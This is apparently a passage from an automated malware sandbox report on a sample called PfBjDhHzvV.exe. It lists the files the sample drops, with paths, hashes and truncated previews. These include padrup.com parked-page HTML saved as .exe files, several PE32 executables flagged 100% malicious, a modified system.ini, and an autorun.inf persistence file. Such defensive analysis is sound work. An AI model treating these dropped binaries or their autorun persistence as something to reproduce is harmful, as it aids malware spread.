                                                                                                                                                                                                                                  SSDEEP:48:+mazpFSITcbMqUtmtE9VCeNocBZ3M7ioaxyi6CVN/MTf992wP:LDpUh9VVN7Si1yi7Ul928
                                                                                                                                                                                                                                  MD5:6D59263785D7B6A6E9C9FA63573FEE3F
                                                                                                                                                                                                                                  SHA1:66E4C072F7E5385E3A7D80CFF887D9628A1478D7
                                                                                                                                                                                                                                  SHA-256:367A921653EC2A4392695DAE2D6560F906B0083ADC5219FB2657B49CB2CE7F3D
                                                                                                                                                                                                                                  SHA-512:58EB1D4A281890D0D41056B745B869ADAC2D9C225B55486BEFA528BDEFB0CA80B05EA4FD6598EBBFC3EB9EE4B3B280971A8C04B0968A15287CA02DD521E5558E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEwMi4yMzc4Ojk3NmU2OGU5NGJlZDI2MTAyZTkwZThmM2ExNWM1OGIxOGYyZGMyYjIyZGI5ODNlOWRlYzhlZDk5MmMxYjVjZGI6NjcxMjEwNmUzYTBjOA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA2ZTNhMDZjfHx8MTcyOTIzNzEw

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winmbftrd.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.641128000089452
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFA21MqUtmtE9VCtpZ3cBsO3M7ioaxyi6CVUlEnMTf992wP:N2HUh9VmYQi1yi7UlEel928
                                                                                                                                                                                                                                  MD5:D4F2F2283C5A57A8812EEC084C63FBB7
                                                                                                                                                                                                                                  SHA1:D42FBE404FD7B29BA4F8BBBADFC6C09D7A8DB991
                                                                                                                                                                                                                                  SHA-256:E320A6AF5B25CBB6F36DB446CE79EC331F0D470BEE41C263923638B8965A75F8
                                                                                                                                                                                                                                  SHA-512:E4C75E3E190077298C0334BDDADF4221082049A9E229DC9395E220FA455BF24276FBEA741866C96F96599DA789FD0ABC1A7783F065BB454DB86367EE4EA7612C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE0Ni40MDk4OmY5YzM3NmNlN2RjMWJmNmY0MjdiNDI1MmE1MDQ4MjlkOTI3OGQxMjQyOWFmNjM2NjU3ZGI5MzRmZjg2YTYzOTk6NjcxMjEwOWE2NDBlYg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5YTY0MGMwfHx8MTcyOTIzNzE0

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winmvfhu.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.646291591905834
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFlhoiMqUtmtE9VCm163cBI3M7ioaxyi6CV3MTf992wP:+VUh9Vj6sxi1yi7ul928
                                                                                                                                                                                                                                  MD5:7EC9B733A5419F16755367D6436BCE2E
                                                                                                                                                                                                                                  SHA1:77C258693D64077CD964EA6B4814484BB68E3C99
                                                                                                                                                                                                                                  SHA-256:B4313ED159B089D8CA3EA359A9A0C169C37571DBEC0340BB63993F75E2F01D77
                                                                                                                                                                                                                                  SHA-512:D961DFD7457744C26E3482B80E5334BEFF1894C708A785467A34521E63E0A55E7217A5A49E262C91893F0DE824E9206D3C9907B8AC53E73406B8C3DCB8074341
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE5NC45OTo0Y2M3NmJjYTg5N2I4ZjdhODAxZmM5MWZhNGNhMjhmMDUyYWQxMjU2NzM5OGRiZmFiOThhNGY0MWY1ZDBiNmM0OjY3MTIxMGNhZjFiMmU=';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBjYWYxYWYxfHx8MTcyOTIzNzE5NS4x

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winnqowgt.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.639805032033733
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF8FjZFHMqUtmtE9VCffU7IcBLs3M7ioaxyi6CVUMTf992wP:xjZHUh9VmAbNi1yi71l928
                                                                                                                                                                                                                                  MD5:602633DE2C81589CF9D3D4924D1B19CE
                                                                                                                                                                                                                                  SHA1:88E139C18B6853962B2255879FCC6956884E0D5C
                                                                                                                                                                                                                                  SHA-256:A889553F798459AF5ED76D40CFAAECFD188F2C8CAC5F2AB18F3F128C6637C922
                                                                                                                                                                                                                                  SHA-512:34353FD12131BDCA01D8729F081781E5E6B97B37FCE3674B7D16F5D5AADED281D748F31DE9DECCDDDF593B3FCE320A7D4C2D04864A6A2F7A1E1367459FCADF44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzIwNC44MTk1OmJlNzE3ODRmZTA4MzUxZDcxYmFlM2Q4NDY1ZDQyMDA2NDM1NmM2M2I4Y2JmYmRmM2Q2NzZmZWNmMmM2Nzc1Yjc6NjcxMjEwZDRjODBmZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBkNGM4MDljfHx8MTcyOTIzNzIw

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winuvylxx.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.6564289139940485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF8/MkcMqUtmtE9VCAccBx3M7ioaxyi6CVzKMTf992wP:Lz4Uh9Vpui1yi7Hl928
                                                                                                                                                                                                                                  MD5:309F786BD133C016CDE0BA32E35A740D
                                                                                                                                                                                                                                  SHA1:566DF1721029E957238031C04D2BCC956063D6C4
                                                                                                                                                                                                                                  SHA-256:3A78AB34778137D546F970A32E4EA0BCA2A42A365E93D0CA78CC13FF9D9CB52A
                                                                                                                                                                                                                                  SHA-512:1E510053DAB692F3B85842F94E96624D122042FC5594012B0C07AAC94638EABCD4F7D34D5B704C2D77BB15EA70954E1F7CDC7726CEFEAB56676942CBBCE04588
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE2Ny45NTUxOmNiNTc2ZDA1M2Y3NzU0MjA0YjZkOGFjZjI5YTQ5MWU3NzMwOTY4NGE1ZGY2YzIyYmY5OTgxOGVjNDAzMzI0ZjI6NjcxMjEwYWZlOTJmYg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBhZmU5MmI0fHx8MTcyOTIzNzE2

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winwxfjkb.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.64247713644331
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFIDB5mMqUtmtE9VCqwjcBWm3M7ioaxyi6CVPMTf992wP:BDB52Uh9VFMi1yi7Gl928
                                                                                                                                                                                                                                  MD5:3715B8D081813AD641B29F11DD7E8EF6
                                                                                                                                                                                                                                  SHA1:9C838A0FFB17E6E3338F54EBA2448AB210E2E16B
                                                                                                                                                                                                                                  SHA-256:0520D3B916514F49DC6EFE53E40767D7D739826E86EE9567F5CB123C3FD25B9E
                                                                                                                                                                                                                                  SHA-512:9B4190C2D275892623E3F48B08F76E947F1A25729BDCDFFB38C4DE5C023122C7BDCED9D1A65809623230EBD177C8F30E4B00D87947BFA028D779305B9BC0EFC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE2Mi41NDk1OmRiMzU3NGNjNWJkZjNjYTIwYjE5YWY3MDY5ODk1MTRlOTRlNTQwNDI2ZDYyYTBhY2FlN2YyNmQ3ZjgxMTU4YWM6NjcxMjEwYWE4NjI2OQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBhYTg2MjNjfHx8MTcyOTIzNzE2

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winyasen.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.658574408919888
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF352UMqUtmtE9VCJcBvn43M7ioaxyi6CVwYMTf992wP:O2gUh9Vd1Xi1yi7Wl928
                                                                                                                                                                                                                                  MD5:1B2AB392EE05D9961C535FD24A34578D
                                                                                                                                                                                                                                  SHA1:6BC7D14EA12C7D4FA386A4E0CBFED65CC2D17A72
                                                                                                                                                                                                                                  SHA-256:5688819D68F7BD8110B8295A8876CFD4C64751492A48ED06C3E83FF4E6248F0A
                                                                                                                                                                                                                                  SHA-512:6754D9B9A16A8DD482C87E0294C0B21048E1A75CFB387D9E632AD72545B837147D122CD346DA444CF1EA734AF05DC967557C2B95C2DC9DF6C58041523A94C002
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE3OC44OTY2OmU1NjUyMGViM2YzYzBjYzc0YzlkMWMwNjJmMmQyZDcwNzZkY2FlOWVlM2M0OGFiMDA2MWRiMWZhNjRiNzA5ZWE6NjcxMjEwYmFkYWU0ZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBiYWRhZTBlfHx8MTcyOTIzNzE3

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winybvnr.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.6496569957265255
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFnEAMqUtmtE9VCtUcBa3M7ioaxyi6CVC3MTf992wP:gUh9VWnXi1yi7Dl928
                                                                                                                                                                                                                                  MD5:5F25F848A47EC95B9F0B64BE978FDA92
                                                                                                                                                                                                                                  SHA1:BCE2339FE3DF3F8B336A78C5F68F3F72D9F26074
                                                                                                                                                                                                                                  SHA-256:9F7E2A973EAEFC9059BE64BDE52E70F04960DD2780989477FF77D49C5983F2CC
                                                                                                                                                                                                                                  SHA-512:24CE08F7718F7B27B1C80ECC904EEDEB4B7EA72BB0D338095F971D2FC0C622794E8761B6B07C3019E867DF0F44150C7B6697F53609412E7315425F8F3208E52A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzExOC40MzQ6NTkxY2U1NmFhMWE0MzMwYTQxMjdhODljMjIzNGJhZGNhOGFjNDI1MTIyMDYxNDA4Yzg5NWQ0YjdjZTNiZjUxMTo2NzEyMTA3ZTY5ZjNh';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA3ZTY5ZWY4fHx8MTcyOTIzNzExOC42

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winysltfm.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.654806351706595
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF/qQh6MqUtmtE9VCshcBJ2cFp3M7ioaxyi6CVgnMTf992wP:wr0Uh9Vq0i1yi7Dl928
                                                                                                                                                                                                                                  MD5:79F64D7CA5FC037FB0D5C45999EB4080
                                                                                                                                                                                                                                  SHA1:5E914AFC461272F13CD463EA3BDD3A2D42B1D07E
                                                                                                                                                                                                                                  SHA-256:E84AA02F089965362871A25C1C9453996195CCB1FDC05983FA522834143E453F
                                                                                                                                                                                                                                  SHA-512:309823A1445DBF7D448BAEAA85F6F8A51D0214679FD720B67EFC532ED50F31398C5779F01690E891064D496AA24ABE0931EEAD99A3B8157E69F73EEB41D60ECD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE4NC44MTk6OWRhOGEyNDhmZjVlZGY5N2IxNzZmY2FmODZiY2VjY2JlMDZiZjM3ZmE0NDNmY2E5MGQzMzM3ZmM3Nzg1MGM3Mzo2NzEyMTBjMGM3ZjBh';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBjMGM3ZWNifHx8MTcyOTIzNzE4NS4w

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winysum.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.979835390414891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:F5aMWAzo5SfpxAF5f5GeE8n8TJbxhc4wpBO:+QIr5GeE8nCbxhnwO
                                                                                                                                                                                                                                  MD5:9EEA00E1926A113F9B3ACB3D3E59F65F
                                                                                                                                                                                                                                  SHA1:AEA1A00FD6D1584F8AF8B4BF76EB5544A3222A28
                                                                                                                                                                                                                                  SHA-256:35DF0D02753C47DDA8A9D9A354685BB3C81E16049A51BF5B9C2E3167F5F7AB5B
                                                                                                                                                                                                                                  SHA-512:36823D11AC02D91712EA0BD6F240D8ABC59103730664B49854DAD058AE350CD58D8439D2894B3C5C7E5E8A5052477D24C871D9748CE9EF4009F96179B4818D60
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................e. ................................................................[.n..~.....U......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xjjalq.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.97458365365783
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:A3ih6kEiSSyEAOTSpOQ3B6orsCb/vY0RYrzGuUGy63G9zr:A3ihTchEhBCDsw/v/YrPyRzr
                                                                                                                                                                                                                                  MD5:68D82A025135407799E9940ED4CE0DB0
                                                                                                                                                                                                                                  SHA1:467A3D0B1ACF45239184A580D3AC391536C53D08
                                                                                                                                                                                                                                  SHA-256:768E75F182EB79C6D58BD29B493D637A6355603A4C2EE23F0C53A48DAEB56167
                                                                                                                                                                                                                                  SHA-512:A34B9C58B8885FBC6E39F677A2A74667415D29657E39F0CF11CB21A268F9F7039891E88C617909E846B3923939316D67379C5FB488E1B00A6A93981A24AFF1FD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................I. ................................................................X.n..~.....U.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xlroe.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.974572330536516
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:/QlTc2D1WmV6VFFJMJzF9Q81F9Od6/CymPEbcr9ShpFGiF9lDv0sVl:/QlrCwcW/CymPEbcJwN0sf
                                                                                                                                                                                                                                  MD5:32828845FFADA76497C37FC525ACE86E
                                                                                                                                                                                                                                  SHA1:6319D250EEDB17CA6358CF08CC47147AAE47328F
                                                                                                                                                                                                                                  SHA-256:CE2F1DEC663BDF3076D824075AFAD038B52866E14C96325202CC07E01C300302
                                                                                                                                                                                                                                  SHA-512:54F82DB58770884E2E78A16A5AD97F5E367F38D2BD1C56EC6D320A06FAD19062F23EE2CC0D98DC6D458F4B42958DB5E0121FFE6584E0C631CD8C76894440D792
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................[.n..~..f...R.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Windows\system.ini

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:Windows SYSTEM.INI
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):255
                                                                                                                                                                                                                                  Entropy (8bit):5.25999590328634
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPgdTk:F4Yv7yk3OUBq82wqFtPgdY
                                                                                                                                                                                                                                  MD5:C1472E2DFC5756C8F34B78E05ACF0680
                                                                                                                                                                                                                                  SHA1:8ECE57FAE13D075987CB3BEEF32FC9A61CC2579F
                                                                                                                                                                                                                                  SHA-256:1D05E477257AC17C0EF606D35958E54A5C1388A8ACCD43DD77FE3368460E7F74
                                                                                                                                                                                                                                  SHA-512:672EE7F9E68BFA8975606F8897766042F26866A60992D3B7E2545E87E020D4AF6681E429A6FB8C4968E6F752BC7DC37BD101F8713158C4AD81D11C69D13CD2C7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=46390628699..

                                                                                                                                                                                                                                  C:\autorun.inf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:Microsoft Windows Autorun file
                                                                                                                                                                                                                                  Category:dropped
